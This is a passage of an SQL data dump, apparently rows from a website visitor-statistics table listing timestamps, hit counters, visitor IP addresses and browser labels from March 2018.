','other'),(217308,1520519355,1,1,0,0,'217.69.133.72','other'),(217309,1520519459,1,0,1,0,'66.249.66.201',''),(217310,1520519779,1,0,1,0,'66.249.66.195',''),(217311,1520519834,1,1,0,0,'54.36.148.160','other'),(217312,1520519910,1,1,0,0,'66.249.66.195','chrome'),(217313,1520519964,1,1,0,0,'54.36.148.146','other'),(217314,1520519971,1,1,0,0,'91.222.32.219','firefox'),(217315,1520519974,1,1,0,0,'66.249.66.156','chrome'),(217316,1520520027,1,1,0,0,'141.8.142.74','other'),(217317,1520520248,1,1,0,0,'52.3.247.79','other'),(217318,1520520357,1,1,0,0,'54.36.148.124','other'),(217319,1520520477,1,1,0,0,'54.36.148.161','other'),(217320,1520520914,1,1,0,0,'54.36.149.38','other'),(217321,1520520991,1,1,0,0,'54.36.149.88','other'),(217322,1520521081,1,0,1,0,'66.249.66.195',''),(217323,1520521516,1,1,0,0,'54.36.148.135','other'),(217324,1520521537,1,1,0,0,'141.8.142.74','other'),(217326,1520521736,2,2,0,0,'54.36.149.59','other'),(217327,1520521747,1,1,0,0,'8.29.198.26','other'),(217328,1520521967,1,1,0,0,'54.36.148.234','other'),(217329,1520522001,1,1,0,0,'54.36.149.30','other'),(217330,1520522191,1,1,0,0,'54.36.149.40','other'),(217331,1520522659,1,1,0,0,'54.36.148.177','other'),(217332,1520523344,1,1,0,0,'217.69.133.69','other'),(217333,1520523386,1,1,0,0,'54.36.149.68','other'),(217334,1520523633,1,1,0,0,'54.36.148.119','other'),(217335,1520523826,1,1,0,0,'157.55.39.36','other'),(217336,1520523965,1,1,0,0,'54.36.148.253','other'),(217337,1520524082,1,1,0,0,'54.36.149.22','other'),(217338,1520524207,1,1,0,0,'54.36.148.209','other'),(217339,1520524276,1,1,0,0,'54.36.148.82','other'),(217340,1520524490,1,1,0,0,'54.36.148.61','other'),(217341,1520524627,1,1,0,0,'217.69.133.248','other'),(217342,1520524749,1,1,0,0,'54.36.148.201','other'),(217343,1520525179,1,1,0,0,'54.36.149.16','other'),(217344,1520525306,1,0,1,0,'66.249.66.156',''),(217345,1520525530,1,1,0,0,'54.36.148.27','other'),(217346,1520525608,1,1,0,0,'66.249.66.199','chrome'),(217347,1520525630,1,1,0,0,'66.249.66.158','chrome'),(217348,1520525850,1,1,0,0,'54.36.148.204','other'),(217349,1520525902,1,1,0,0,'62.210.101.104','other'),(217350,1520525947,1,1,0,0,'54.36.148.94','other'),(217351,1520525963,1,1,0,0,'54.36.148.16','other'),(217352,1520525992,1,1,0,0,'54.36.148.246','other'),(217353,1520526020,1,1,0,0,'54.36.149.95','other'),(217354,1520526050,1,1,0,0,'54.36.148.225','other'),(217355,1520526074,1,1,0,0,'54.36.149.67','other'),(217356,1520526235,1,1,0,0,'54.36.148.33','other'),(217357,1520526474,1,1,0,0,'69.30.211.2','other'),(217358,1520527174,1,1,0,0,'54.36.148.71','other'),(217359,1520527230,1,1,0,0,'157.55.39.248','other'),(217360,1520527232,1,1,0,0,'207.46.13.125','other'),(217361,1520527702,1,1,0,0,'87.250.224.46','other'),(217362,1520527845,1,1,0,0,'54.36.148.212','other'),(217363,1520527971,1,1,0,0,'54.36.148.95','other'),(217364,1520528380,1,1,0,0,'54.36.148.186','other'),(217365,1520528493,1,1,0,0,'54.36.148.24','other'),(217366,1520528644,1,0,1,0,'66.249.66.195',''),(217367,1520528681,1,1,0,0,'54.36.148.85','other'),(217368,1520528934,1,1,0,0,'54.36.148.21','other'),(217369,1520528982,1,1,0,0,'54.36.148.33','other'),(217370,1520529009,1,1,0,0,'54.36.149.14','other'),(217371,1520529305,2,2,0,0,'188.191.237.185','chrome'),(217372,1520529480,1,1,0,0,'54.36.148.125','other'),(217373,1520529487,1,1,0,0,'54.36.148.49','other'),(217374,1520529905,1,1,0,0,'54.36.148.66','other'),(217375,1520530435,1,0,1,0,'66.249.66.201',''),(217376,1520530454,1,1,0,0,'216.244.66.237','other'),(217377,1520530603,1,0,1,0,'66.249.66.157',''),(217378,1520530721,1,1,0,0,'54.36.148.210','other'),(217379,1520530807,1,1,0,0,'54.36.149.76','other'),(217380,1520530815,1,1,0,0,'66.249.66.76','chrome'),(217381,1520530832,1,1,0,0,'66.249.66.80','chrome'),(217382,1520531242,1,1,0,0,'54.36.148.151','other'),(217383,1520531289,1,1,0,0,'217.69.133.237','other'),(217384,1520531293,1,1,0,0,'217.69.133.70','other'),(217385,1520531673,1,1,0,0,'54.36.148.186','other'),(217386,1520531715,1,1,0,0,'54.36.149.22','other'),(217387,1520532089,2,2,0,0,'54.36.148.122','other'),(217388,1520532298,1,1,0,0,'37.73.216.157','chrome'),(217389,1520532398,1,1,0,0,'54.36.149.77','other'),(217390,1520532530,1,1,0,0,'91.213.33.104','chrome'),(217391,1520532538,1,1,0,0,'141.8.142.74','other'),(217392,1520532602,1,1,0,0,'8.29.198.27','other'),(217393,1520533403,1,1,0,0,'207.46.13.188','other'),(217394,1520534063,1,0,1,0,'66.249.66.201',''),(217395,1520534344,1,0,1,0,'66.249.66.156',''),(217396,1520534655,1,1,0,0,'54.36.148.198','other'),(217397,1520534815,1,0,1,0,'66.249.66.195',''),(217398,1520534839,2,2,0,0,'91.196.178.30','chrome'),(217399,1520534842,1,1,0,0,'54.36.149.17','other'),(217400,1520534861,1,1,0,0,'54.36.148.218','other'),(217401,1520535576,1,1,0,0,'54.36.148.61','other'),(217402,1520535594,1,1,0,0,'54.36.148.146','other'),(217403,1520535723,1,1,0,0,'54.36.148.210','other'),(217404,1520535837,1,1,0,0,'87.250.224.46','other'),(217405,1520535869,1,1,0,0,'178.154.171.88','other'),(217406,1520535899,1,1,0,0,'141.8.142.74','other'),(217407,1520535902,1,1,0,0,'37.9.113.182','other'),(217408,1520536021,1,1,0,0,'217.69.133.234','other'),(217409,1520536137,1,1,0,0,'54.36.148.22','other'),(217410,1520536190,1,0,1,0,'66.249.66.155',''),(217411,1520536565,1,1,0,0,'54.36.148.191','other'),(217412,1520536651,1,1,0,0,'54.36.148.198','other'),(217413,1520536675,1,1,0,0,'54.36.148.249','other'),(217414,1520536875,1,1,0,0,'54.36.148.116','other'),(217415,1520536895,1,1,0,0,'54.36.149.32','other'),(217416,1520537224,1,0,1,0,'66.249.66.199',''),(217417,1520537769,1,0,1,0,'66.249.66.157',''),(217418,1520537805,1,1,0,0,'54.36.148.159','other'),(217419,1520537955,1,1,0,0,'66.249.66.201','chrome'),(217420,1520537963,1,1,0,0,'66.249.66.156','chrome'),(217421,1520537978,1,1,0,0,'178.154.171.88','other'),(217422,1520538337,1,1,0,0,'54.36.148.114','other'),(217423,1520538504,2,2,0,0,'92.113.188.43','chrome'),(217424,1520538792,1,1,0,0,'91.209.11.236','other'),(217425,1520539131,1,1,0,0,'54.36.149.54','other'),(217426,1520540181,1,1,0,0,'217.69.133.226','other'),(217427,1520540758,1,1,0,0,'207.46.13.125','other'),(217428,1520540864,1,1,0,0,'54.36.148.82','other'),(217429,1520540968,1,1,0,0,'54.36.149.70','other'),(217430,1520541491,1,1,0,0,'54.36.148.52','other'),(217431,1520541540,1,1,0,0,'54.36.148.207','other'),(217432,1520541674,1,0,1,0,'66.249.66.74',''),(217433,1520542620,1,1,0,0,'85.195.118.42','firefox'),(217434,1520542681,1,1,0,0,'54.36.148.185','other'),(217435,1520542733,1,1,0,0,'54.36.148.141','other'),(217436,1520542844,1,1,0,0,'178.154.200.7','other'),(217437,1520543135,1,1,0,0,'54.36.149.40','other'),(217438,1520543361,1,1,0,0,'54.36.148.51','other'),(217439,1520543373,1,1,0,0,'66.249.66.201','chrome'),(217440,1520543395,1,1,0,0,'66.249.66.156','chrome'),(217441,1520543451,1,1,0,0,'8.29.198.25','other'),(217442,1520543541,1,1,0,0,'54.36.148.138','other'),(217443,1520544156,1,1,0,0,'54.36.149.74','other'),(217444,1520544325,1,1,0,0,'54.36.149.101','other'),(217445,1520544951,1,1,0,0,'54.36.148.11','other'),(217446,1520545099,1,0,1,0,'66.249.66.157',''),(217447,1520545442,1,1,0,0,'217.69.133.253','other'),(217448,1520545458,1,1,0,0,'54.36.148.20','other'),(217449,1520545776,1,1,0,0,'54.36.149.84','other'),(217450,1520545797,1,1,0,0,'54.36.148.252','other'),(217451,1520545906,1,1,0,0,'54.36.149.14','other'),(217452,1520546340,2,0,2,0,'66.249.66.195',''),(217453,1520546446,1,1,0,0,'54.36.148.236','other'),(217454,1520546640,1,1,0,0,'178.154.171.55','other'),(217455,1520547008,1,1,0,0,'213.180.203.8','other'),(217456,1520547114,1,0,1,0,'66.249.66.199',''),(217457,1520547158,1,1,0,0,'54.36.149.40','other'),(217458,1520547421,1,1,0,0,'54.36.148.14','other'),(217459,1520548060,1,1,0,0,'54.36.148.181','other'),(217460,1520548074,1,1,0,0,'54.36.149.49','other'),(217461,1520548463,1,1,0,0,'66.249.66.195','chrome'),(217462,1520548467,1,1,0,0,'66.249.66.157','chrome'),(217463,1520548643,1,1,0,0,'37.9.113.115','other'),(217464,1520548835,1,1,0,0,'157.55.39.36','other'),(217465,1520548873,1,1,0,0,'91.124.22.206','chrome'),(217466,1520548926,1,1,0,0,'217.69.133.232','other'),(217467,1520548945,1,1,0,0,'54.36.149.82','other'),(217468,1520549148,1,1,0,0,'54.36.148.171','other'),(217469,1520549382,1,1,0,0,'54.36.148.214','other'),(217470,1520549418,1,1,0,0,'54.36.148.249','other'),(217471,1520549523,1,0,1,0,'66.249.66.195',''),(217472,1520549547,1,1,0,0,'54.36.148.126','other'),(217473,1520549661,1,0,1,0,'66.249.66.199',''),(217474,1520549714,1,1,0,0,'54.36.148.229','other'),(217475,1520549729,1,1,0,0,'54.36.148.125','other'),(217476,1520549840,1,1,0,0,'54.36.149.95','other'),(217477,1520549866,1,1,0,0,'54.36.148.243','other'),(217478,1520549897,1,1,0,0,'54.36.148.248','other'),(217479,1520549917,1,1,0,0,'54.36.149.10','other'),(217480,1520550094,1,1,0,0,'54.36.148.167','other'),(217481,1520550099,1,1,0,0,'54.36.148.149','other'),(217482,1520550189,1,1,0,0,'54.36.149.99','other'),(217483,1520550279,1,1,0,0,'54.36.148.97','other'),(217484,1520550351,1,1,0,0,'54.36.148.196','other'),(217485,1520550483,1,0,1,0,'66.249.66.195',''),(217486,1520550693,1,1,0,0,'54.36.148.88','other'),(217487,1520550848,1,1,0,0,'178.154.171.88','other'),(217488,1520550907,1,1,0,0,'52.91.120.227','other'),(217489,1520550967,2,2,0,0,'54.36.148.236','other'),(217490,1520551035,1,1,0,0,'54.36.148.149','other'),(217491,1520551407,1,1,0,0,'54.36.148.117','other'),(217492,1520551466,1,1,0,0,'54.36.148.112','other'),(217493,1520551795,1,1,0,0,'54.36.149.12','other'),(217494,1520551802,1,1,0,0,'54.36.148.31','other'),(217495,1520552121,1,1,0,0,'52.91.120.227','other'),(217496,1520552404,1,1,0,0,'54.36.148.146','other'),(217497,1520552569,1,1,0,0,'54.36.148.219','other'),(217498,1520552659,1,1,0,0,'54.36.148.87','other'),(217499,1520553077,2,2,0,0,'130.180.217.194','chrome'),(217500,1520554288,1,1,0,0,'8.29.198.27','other'),(217501,1520554430,1,1,0,0,'54.36.148.216','other'),(217502,1520554453,1,1,0,0,'52.91.120.227','other'),(217503,1520555360,1,1,0,0,'52.91.120.227','other'),(217504,1520556198,1,1,0,0,'217.69.133.193','other'),(217505,1520556252,1,1,0,0,'54.36.148.181','other'),(217506,1520556334,1,1,0,0,'52.91.120.227','other'),(217507,1520556539,1,1,0,0,'54.36.149.1','other'),(217508,1520556686,1,1,0,0,'54.36.149.54','other'),(217509,1520556952,1,1,0,0,'54.36.148.123','other'),(217510,1520557030,1,1,0,0,'54.36.148.27','other'),(217511,1520557063,1,1,0,0,'54.36.148.119','other'),(217512,1520557246,1,1,0,0,'52.91.120.227','other'),(217513,1520557583,1,1,0,0,'54.36.148.162','other'),(217514,1520557588,1,1,0,0,'54.36.148.167','other'),(217515,1520557749,1,1,0,0,'54.36.148.70','other'),(217516,1520558176,1,1,0,0,'54.36.148.18','other'),(217517,1520558252,1,1,0,0,'217.69.133.245','other'),(217518,1520558274,1,1,0,0,'52.91.120.227','other'),(217519,1520558517,1,1,0,0,'54.36.148.200','other'),(217520,1520558553,1,1,0,0,'54.36.149.76','other'),(217521,1520558705,1,1,0,0,'54.36.149.42','other'),(217522,1520559195,1,1,0,0,'217.69.136.205','other'),(217523,1520559202,1,1,0,0,'52.91.120.227','other'),(217524,1520559514,1,1,0,0,'54.36.148.73','other'),(217525,1520559652,1,1,0,0,'54.36.149.26','other'),(217526,1520560809,1,1,0,0,'52.91.120.227','other'),(217527,1520560862,1,1,0,0,'54.36.148.26','other'),(217528,1520560892,1,1,0,0,'141.8.142.74','other'),(217529,1520560937,1,1,0,0,'157.55.39.251','other'),(217530,1520561684,1,1,0,0,'54.36.149.8','other'),(217531,1520561718,1,1,0,0,'52.91.120.227','other'),(217532,1520562060,1,1,0,0,'54.36.148.18','other'),(217533,1520562374,1,1,0,0,'54.36.148.229','other'),(217534,1520562657,1,1,0,0,'52.91.120.227','other'),(217535,1520563199,1,1,0,0,'54.36.149.62','other'),(217536,1520563235,1,1,0,0,'54.36.149.11','other'),(217537,1520563540,1,1,0,0,'54.36.148.114','other'),(217538,1520563597,1,1,0,0,'52.91.120.227','other'),(217539,1520563621,1,0,1,0,'66.249.66.201',''),(217540,1520563859,2,2,0,0,'178.154.171.88','other'),(217541,1520563914,1,1,0,0,'54.36.148.177','other'),(217542,1520564060,1,1,0,0,'54.36.148.227','other'),(217543,1520564152,1,1,0,0,'87.250.224.46','other'),(217544,1520564449,1,1,0,0,'54.36.148.153','other'),(217545,1520564458,1,1,0,0,'217.69.133.220','other'),(217546,1520564657,1,1,0,0,'141.8.142.74','other'),(217547,1520564887,1,1,0,0,'54.36.149.78','other'),(217548,1520564921,1,1,0,0,'52.91.120.227','other'),(217549,1520565136,1,1,0,0,'8.29.198.26','other'),(217550,1520565198,1,1,0,0,'54.36.148.177','other'),(217551,1520565295,1,1,0,0,'217.69.133.23','other'),(217552,1520565414,1,1,0,0,'178.255.215.94','other'),(217553,1520565920,1,1,0,0,'52.91.120.227','other'),(217554,1520566023,1,1,0,0,'54.36.149.6','other'),(217555,1520566284,1,1,0,0,'54.36.148.80','other'),(217556,1520566356,1,1,0,0,'54.36.148.110','other'),(217557,1520566730,1,1,0,0,'157.55.39.251','other'),(217558,1520567160,1,1,0,0,'52.3.247.79','other'),(217559,1520567703,1,1,0,0,'54.36.148.255','other'),(217560,1520568226,1,1,0,0,'37.9.113.182','other'),(217561,1520568369,1,1,0,0,'54.36.148.213','other'),(217562,1520568755,1,1,0,0,'54.36.148.246','other'),(217563,1520569006,1,0,1,0,'66.249.66.201',''),(217564,1520569055,1,1,0,0,'217.69.133.238','other'),(217565,1520569101,1,1,0,0,'54.36.148.220','other'),(217566,1520569255,1,1,0,0,'52.91.120.227','other'),(217567,1520569329,1,1,0,0,'54.36.148.84','other'),(217568,1520569335,1,1,0,0,'54.36.149.99','other'),(217569,1520569629,1,1,0,0,'54.36.148.66','other'),(217570,1520570179,1,1,0,0,'52.91.120.227','other'),(217571,1520570360,1,1,0,0,'54.36.148.21','other'),(217572,1520570379,1,1,0,0,'54.36.148.119','other'),(217573,1520570400,1,1,0,0,'52.3.247.79','other'),(217574,1520570449,1,1,0,0,'52.24.96.162','msie'),(217575,1520570916,1,1,0,0,'54.36.149.96','other'),(217576,1520571113,1,1,0,0,'52.91.120.227','other'),(217577,1520571522,1,1,0,0,'54.36.149.81','other'),(217578,1520571594,1,1,0,0,'52.24.96.162','opera'),(217579,1520572027,1,1,0,0,'52.91.120.227','other'),(217580,1520572145,1,0,1,0,'66.249.66.195',''),(217581,1520572279,1,1,0,0,'54.36.148.206','other'),(217582,1520572303,1,0,1,0,'66.249.66.201',''),(217583,1520572610,1,1,0,0,'54.36.148.102','other'),(217584,1520572746,1,1,0,0,'54.36.148.199','other'),(217585,1520572813,1,1,0,0,'54.36.149.14','other'),(217586,1520572834,1,1,0,0,'178.154.171.88','other'),(217587,1520572875,1,1,0,0,'54.36.148.105','other'),(217588,1520572998,1,1,0,0,'54.36.149.70','other'),(217589,1520573049,1,1,0,0,'66.249.66.201','chrome'),(217590,1520573050,1,1,0,0,'52.91.120.227','other'),(217591,1520573082,1,1,0,0,'54.36.148.97','other'),(217592,1520573292,1,1,0,0,'52.3.247.79','other'),(217593,1520573341,1,1,0,0,'54.36.148.85','other'),(217594,1520573382,1,1,0,0,'54.36.149.19','other'),(217595,1520573559,1,1,0,0,'54.36.148.34','other'),(217596,1520573657,1,1,0,0,'54.36.148.174','other'),(217597,1520574025,1,1,0,0,'54.36.149.61','other'),(217598,1520574087,1,1,0,0,'52.91.120.227','other'),(217599,1520574402,1,1,0,0,'54.36.148.31','other'),(217600,1520574708,1,1,0,0,'54.36.148.217','other'),(217601,1520574875,1,1,0,0,'54.36.148.119','other'),(217602,1520575016,1,1,0,0,'52.91.120.227','other'),(217603,1520575110,1,1,0,0,'178.154.171.88','other'),(217604,1520575411,1,1,0,0,'54.36.149.7','other'),(217605,1520575523,1,1,0,0,'54.36.148.92','other'),(217606,1520575785,1,1,0,0,'5.9.156.43','other'),(217607,1520575947,1,1,0,0,'52.91.120.227','other'),(217608,1520575982,1,1,0,0,'54.36.148.190','other'),(217609,1520575993,1,1,0,0,'8.29.198.25','other'),(217610,1520576150,1,1,0,0,'141.8.142.74','other'),(217611,1520576282,1,1,0,0,'54.36.148.64','other'),(217612,1520576517,1,1,0,0,'54.36.148.84','other'),(217613,1520576721,1,1,0,0,'54.36.148.191','other'),(217614,1520576861,1,1,0,0,'52.91.120.227','other'),(217615,1520576923,1,1,0,0,'54.36.148.177','other'),(217616,1520576998,1,1,0,0,'54.36.148.46','other'),(217617,1520577651,1,1,0,0,'54.67.59.131','chrome'),(217618,1520577879,1,1,0,0,'52.91.120.227','other'),(217619,1520577950,1,0,1,0,'66.249.66.195',''),(217620,1520578057,1,0,1,0,'66.249.66.199',''),(217621,1520578526,1,1,0,0,'54.36.148.226','other'),(217622,1520578998,1,1,0,0,'217.69.136.205','other'),(217623,1520579007,1,1,0,0,'52.91.120.227','other'),(217624,1520579352,1,1,0,0,'54.36.148.94','other'),(217625,1520579752,1,1,0,0,'54.36.148.79','other'),(217626,1520580159,1,1,0,0,'54.36.148.78','other'),(217627,1520580304,1,1,0,0,'52.91.120.227','other'),(217628,1520580339,1,1,0,0,'54.36.149.49','other'),(217629,1520580419,1,1,0,0,'178.154.171.88','other'),(217630,1520580658,1,1,0,0,'54.36.148.102','other'),(217631,1520580805,1,1,0,0,'54.36.148.200','other'),(217632,1520580873,2,2,0,0,'92.113.188.43','chrome'),(217633,1520581240,1,1,0,0,'52.91.120.227','other'),(217634,1520581273,1,1,0,0,'54.36.149.9','other'),(217635,1520581336,1,1,0,0,'141.8.142.74','other'),(217636,1520581723,1,1,0,0,'54.36.149.42','other'),(217637,1520581823,1,1,0,0,'54.36.149.6','other'),(217638,1520581869,1,1,0,0,'54.36.149.17','other'),(217639,1520582023,1,1,0,0,'54.36.148.130','other'),(217640,1520582122,2,2,0,0,'213.111.82.159','chrome'),(217641,1520582182,1,1,0,0,'52.91.120.227','other'),(217642,1520582514,1,1,0,0,'188.166.121.88','chrome'),(217643,1520582522,2,2,0,0,'46.201.135.109','chrome'),(217644,1520582642,1,1,0,0,'217.69.136.208','other'),(217645,1520582655,1,1,0,0,'54.36.148.66','other'),(217646,1520583116,1,1,0,0,'52.91.120.227','other'),(217647,1520583160,1,1,0,0,'54.36.149.37','other'),(217648,1520583961,1,1,0,0,'54.36.148.88','other'),(217649,1520583984,1,1,0,0,'54.36.149.46','other'),(217650,1520584165,1,1,0,0,'52.91.120.227','other'),(217651,1520584312,1,1,0,0,'54.36.149.20','other'),(217652,1520584553,1,1,0,0,'217.69.133.23','other'),(217653,1520584793,1,1,0,0,'217.69.133.228','other'),(217654,1520584855,1,1,0,0,'141.8.142.74','other'),(217655,1520585008,1,1,0,0,'54.36.148.32','other'),(217656,1520585066,1,1,0,0,'54.36.149.74','other'),(217657,1520585408,1,1,0,0,'66.249.66.201','chrome'),(217658,1520585554,1,1,0,0,'178.154.171.88','other'),(217659,1520585611,1,1,0,0,'52.91.120.227','other'),(217660,1520585664,1,1,0,0,'87.250.224.46','other'),(217661,1520585843,1,1,0,0,'54.36.149.87','other'),(217662,1520586072,1,1,0,0,'54.36.148.60','other'),(217663,1520586164,1,1,0,0,'66.249.66.195','chrome'),(217664,1520586566,1,1,0,0,'52.91.120.227','other'),(217665,1520586838,1,1,0,0,'8.29.198.25','other'),(217666,1520587012,1,1,0,0,'54.36.148.111','other'),(217667,1520587308,1,1,0,0,'91.196.178.134','chrome'),(217668,1520587359,1,1,0,0,'54.36.148.227','other'),(217669,1520587530,1,1,0,0,'52.91.120.227','other'),(217670,1520588400,1,1,0,0,'54.36.148.89','other'),(217671,1520588470,1,1,0,0,'54.36.148.225','other'),(217672,1520588687,1,1,0,0,'54.36.148.84','other'),(217673,1520588704,1,1,0,0,'52.91.120.227','other'),(217674,1520588752,1,1,0,0,'178.154.171.88','other'),(217675,1520588843,1,1,0,0,'217.69.133.232','other'),(217676,1520589688,1,1,0,0,'52.91.120.227','other'),(217677,1520590011,1,1,0,0,'54.36.148.129','other'),(217678,1520590082,1,1,0,0,'217.69.133.235','other'),(217679,1520590128,1,1,0,0,'54.36.149.51','other'),(217680,1520590320,1,0,1,0,'66.249.66.199',''),(217681,1520590452,1,1,0,0,'54.36.149.9','other'),(217682,1520590820,1,1,0,0,'54.36.148.237','other'),(217683,1520591358,1,1,0,0,'52.91.120.227','other'),(217684,1520591772,1,1,0,0,'54.36.148.115','other'),(217685,1520591894,1,1,0,0,'107.167.107.120','other'),(217686,1520592170,1,1,0,0,'178.154.171.88','other'),(217687,1520592246,1,1,0,0,'54.36.148.236','other'),(217688,1520592328,1,1,0,0,'52.91.120.227','other'),(217689,1520592472,1,1,0,0,'54.36.149.0','other'),(217690,1520592726,1,1,0,0,'54.36.148.152','other'),(217691,1520592949,1,1,0,0,'54.36.149.100','other'),(217692,1520593534,1,1,0,0,'52.91.120.227','other'),(217693,1520593541,1,1,0,0,'54.36.148.213','other'),(217694,1520593659,1,1,0,0,'141.8.142.74','other'),(217695,1520593778,2,0,2,0,'66.249.66.195',''),(217696,1520594224,1,1,0,0,'54.36.148.16','other'),(217697,1520594460,1,1,0,0,'180.76.15.154','other'),(217698,1520594475,1,1,0,0,'52.91.120.227','other'),(217699,1520594925,1,1,0,0,'54.36.148.22','other'),(217700,1520595160,1,1,0,0,'46.161.9.39','firefox'),(217701,1520595217,1,1,0,0,'54.36.148.124','other'),(217702,1520595434,1,1,0,0,'37.9.113.182','other'),(217703,1520595436,1,1,0,0,'52.3.247.79','other'),(217704,1520596038,1,1,0,0,'54.36.148.104','other'),(217705,1520596064,1,1,0,0,'54.36.148.112','other'),(217706,1520596216,1,1,0,0,'52.91.120.227','other'),(217707,1520596333,1,1,0,0,'178.154.171.88','other'),(217708,1520596550,1,1,0,0,'54.36.148.221','other'),(217709,1520597631,1,0,1,0,'66.249.66.157',''),(217710,1520597676,1,1,0,0,'8.29.198.26','other'),(217711,1520597726,1,1,0,0,'66.249.66.157','chrome'),(217712,1520597736,1,1,0,0,'66.249.66.199','chrome'),(217713,1520598018,1,1,0,0,'178.154.171.88','other'),(217714,1520598141,37,37,0,0,'204.12.226.26','other'),(217715,1520598179,1,1,0,0,'54.36.149.20','other'),(217716,1520598223,1,1,0,0,'54.36.148.47','other'),(217717,1520598272,1,1,0,0,'54.36.148.143','other'),(217718,1520598387,1,1,0,0,'54.36.149.106','other'),(217719,1520598451,1,1,0,0,'54.36.149.86','other'),(217720,1520598902,1,1,0,0,'141.8.142.74','other'),(217721,1520599270,1,1,0,0,'52.91.120.227','other'),(217722,1520599536,1,1,0,0,'54.36.148.34','other'),(217723,1520599546,1,1,0,0,'54.36.148.38','other'),(217724,1520599751,1,1,0,0,'54.36.148.120','other'),(217725,1520599921,1,1,0,0,'91.226.34.19','chrome'),(217726,1520600052,1,1,0,0,'54.36.148.161','other'),(217727,1520600059,1,0,1,0,'66.249.66.201',''),(217728,1520600288,1,0,1,0,'66.249.66.195',''),(217729,1520600718,1,1,0,0,'54.36.148.119','other'),(217730,1520600894,1,1,0,0,'54.36.148.213','other'),(217731,1520600962,1,1,0,0,'54.36.148.37','other'),(217732,1520600976,1,1,0,0,'54.36.148.125','other'),(217733,1520601029,1,1,0,0,'54.36.148.42','other'),(217734,1520601207,1,1,0,0,'54.36.148.191','other'),(217735,1520601372,1,0,1,0,'66.249.66.195',''),(217736,1520601588,1,1,0,0,'87.250.224.46','other'),(217737,1520601602,1,1,0,0,'54.36.148.235','other'),(217738,1520601648,1,1,0,0,'180.76.15.160','other'),(217739,1520601867,1,1,0,0,'52.3.247.79','other'),(217740,1520601939,1,1,0,0,'52.91.120.227','other'),(217741,1520602324,1,1,0,0,'54.36.149.54','other'),(217742,1520602670,1,1,0,0,'91.196.178.81','chrome'),(217743,1520602738,1,1,0,0,'54.36.148.123','other'),(217744,1520602811,1,1,0,0,'54.36.149.61','other'),(217745,1520603291,1,1,0,0,'217.69.133.240','other'),(217746,1520603409,1,1,0,0,'54.36.149.94','other'),(217747,1520603869,1,1,0,0,'157.55.39.251','other'),(217748,1520603975,1,1,0,0,'54.36.149.29','other'),(217749,1520604039,1,1,0,0,'54.36.148.221','other'),(217750,1520604064,1,1,0,0,'54.36.149.57','other'),(217751,1520604108,1,1,0,0,'52.91.120.227','other'),(217752,1520604288,1,1,0,0,'54.36.148.56','other'),(217753,1520604791,1,1,0,0,'52.3.247.79','other'),(217754,1520604953,1,1,0,0,'54.36.148.22','other'),(217755,1520605196,1,1,0,0,'5.105.225.71','chrome'),(217756,1520605471,1,1,0,0,'54.36.148.23','other'),(217757,1520605546,1,1,0,0,'54.36.148.93','other'),(217758,1520605601,1,1,0,0,'54.36.149.48','other'),(217759,1520605663,1,1,0,0,'54.36.148.25','other'),(217760,1520605905,1,1,0,0,'54.36.148.127','other'),(217761,1520605918,1,1,0,0,'54.36.148.185','other'),(217762,1520605985,1,1,0,0,'54.36.148.11','other'),(217763,1520606078,1,1,0,0,'52.91.120.227','other'),(217764,1520606249,1,1,0,0,'37.9.113.115','other'),(217765,1520606769,2,0,2,0,'66.249.66.199',''),(217766,1520607141,1,1,0,0,'54.36.148.147','other'),(217767,1520607500,1,1,0,0,'52.3.247.79','other'),(217768,1520607525,1,1,0,0,'141.8.142.74','other'),(217769,1520607878,1,1,0,0,'52.91.120.227','other'),(217770,1520607902,1,1,0,0,'54.36.148.137','other'),(217771,1520607906,1,1,0,0,'54.36.149.76','other'),(217772,1520608004,1,1,0,0,'54.36.148.157','other'),(217773,1520608514,1,1,0,0,'8.29.198.27','other'),(217774,1520608705,1,1,0,0,'54.36.148.255','other'),(217775,1520609211,1,1,0,0,'54.36.149.1','other'),(217776,1520609506,1,1,0,0,'52.91.120.227','other'),(217777,1520609754,1,1,0,0,'54.36.149.25','other'),(217778,1520610147,1,1,0,0,'141.8.142.74','other'),(217779,1520610194,1,1,0,0,'54.36.148.100','other'),(217780,1520610204,2,1,1,0,'66.249.66.201',''),(217781,1520610207,1,1,0,0,'66.249.66.157','chrome'),(217782,1520610213,1,0,1,0,'66.249.66.156',''),(217783,1520610477,1,1,0,0,'54.36.148.252','other'),(217784,1520610635,1,1,0,0,'54.36.148.83','other'),(217785,1520610764,1,0,1,0,'66.249.66.195',''),(217786,1520610901,1,1,0,0,'54.36.148.29','other'),(217787,1520610928,1,1,0,0,'141.8.132.19','other'),(217788,1520611174,1,1,0,0,'52.91.120.227','other'),(217789,1520611212,1,1,0,0,'141.8.142.74','other'),(217790,1520611357,2,0,2,0,'66.249.66.199',''),(217791,1520611725,1,1,0,0,'147.135.128.113','other'),(217792,1520611888,2,2,0,0,'178.154.171.88','other'),(217793,1520611917,1,1,0,0,'216.244.66.237','other'),(217794,1520611993,1,1,0,0,'54.36.148.157','other'),(217795,1520612634,1,1,0,0,'54.36.148.187','other'),(217796,1520612704,1,1,0,0,'52.91.120.227','other'),(217797,1520612818,1,1,0,0,'54.36.148.19','other'),(217798,1520612878,1,1,0,0,'141.8.142.74','other'),(217799,1520613005,1,1,0,0,'188.230.43.254','other'),(217800,1520613384,1,0,1,0,'66.249.66.195',''),(217801,1520613502,1,1,0,0,'54.36.149.78','other'),(217802,1520613509,1,1,0,0,'54.36.148.57','other'),(217803,1520613529,1,1,0,0,'54.36.148.234','other'),(217804,1520614024,1,1,0,0,'54.36.148.200','other'),(217805,1520614041,1,1,0,0,'52.91.120.227','other'),(217806,1520614091,1,1,0,0,'54.36.148.74','other'),(217807,1520614241,2,0,2,0,'66.249.66.201',''),(217808,1520614601,1,1,0,0,'54.36.148.100','other'),(217809,1520614985,1,1,0,0,'54.36.148.117','other'),(217810,1520615402,1,1,0,0,'188.230.43.254','other'),(217811,1520615434,1,1,0,0,'52.91.120.227','other'),(217812,1520615535,1,1,0,0,'54.36.148.52','other'),(217813,1520615682,1,1,0,0,'66.249.66.199','chrome'),(217814,1520615684,1,0,1,0,'66.249.66.158',''),(217815,1520615690,1,1,0,0,'66.249.66.157','chrome'),(217816,1520616320,1,1,0,0,'54.36.148.246','other'),(217817,1520616516,1,0,1,0,'66.249.66.201',''),(217818,1520616690,1,1,0,0,'52.91.120.227','other'),(217819,1520617115,1,1,0,0,'54.36.149.64','other'),(217820,1520617404,1,1,0,0,'54.36.148.14','other'),(217821,1520617616,1,1,0,0,'54.165.59.7','other'),(217822,1520617669,1,0,1,0,'66.249.66.199',''),(217823,1520617782,1,1,0,0,'54.36.148.200','other'),(217824,1520617801,2,2,0,0,'91.196.17